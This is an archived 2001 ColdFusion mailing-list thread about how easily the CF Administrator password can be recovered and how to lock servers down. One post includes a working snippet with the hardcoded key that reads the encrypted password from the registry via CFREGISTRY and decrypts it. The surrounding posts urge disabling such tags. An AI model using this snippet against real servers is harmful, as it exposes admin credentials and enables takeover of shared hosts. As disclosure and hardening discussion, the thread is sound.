Go to the CF Admin, under 'Basic Security' is a list of tags you can
disable. That's of course just the first step towards securing the server.
If you're running a shared environ make sure to grab the Allaire path to
disable the CF Admin undocumented tags/functions as you can do all sorts of
fun stuff w/ them. There are of course thousands of other things to be done,
so have fun.
Just a note on template encrypting: It's scarcly worth it as the server
obviously needs a fixed key (as shown below) to make it portable and has to
be an easy scheme to make the template run w/o much decryption overhead.
Anyone w/ even basic knowledge of DES encryption and programming can sit
down and reverse engineer the simplistic algorythm used. The proliferation
of decryption binaries and the original key phrase now (I hadn't actual seen
that before) makes it a waste of server resources.
-----Original Message-----
From: John Fix 3rd [mailto:[EMAIL PROTECTED]]
Sent: March 10, 2001 07:57
To: CF-Talk
Subject: RE: Finding the CF Administrator password
How does one disable CFRegistry?
Thanks!
John
-----Original Message-----
From: CF [mailto:[EMAIL PROTECTED]]
Sent: Saturday, March 10, 2001 10:48 AM
To: CF-Talk
Subject: Re: Finding the CF Administrator password
Yeah .. someone sent me the key a little earlier and it worked like a
charm. Actually, this other peson also showed me how to find the key to
begin with ... it's amazingly simple. I don't see why you should be
flamed .. people should not have CFRegistry active on a machine where
they wouldn't want people getting in and doing stuff like this anyway.
This is just another great example of why ;)
Todd Ashworth
Web Application Developer
Network Administrator
Saber Corporation
314 Oakland Ave.
Rock Hill, SC 29730
(803) 327-0137 [111] (p)
(803) 328-2868 (f)
----- Original Message -----
From: "Dain Anderson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Saturday, March 10, 2001 12:07 AM
Subject: Re: Finding the CF Administrator password
> Todd,
>
> It's very easy to retrieve the admin password, and I'm sure I will get
> flamed for showing this, but what the hell:
>
> <CFSET CFKey = "4p0L@r1$">
>
> <CFREGISTRY ACTION=GET
>
>
Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Se
rver
> "
> Entry="AdminPassword"
> Variable="AdminPassword">
>
> <CFOUTPUT>
> Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
> </CFOUTPUT>
>
> The key to decrypt it spells "4 Polaris" (Allaire inside joke?) --
> this isn't my doing; rather, I was sent this from an anonymous source
> via the [EMAIL PROTECTED] address. I hope this will show Allaire
> and ISPs that there is a need for encryption, not encoding, for things
> such as this. I
am
> against template encryption personally, but the administrator feature
should
> have much better security. We live and learn, strive and yearn.
>
> Dain Anderson
> Caretaker, CF Comet
> http://www.cfcomet.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
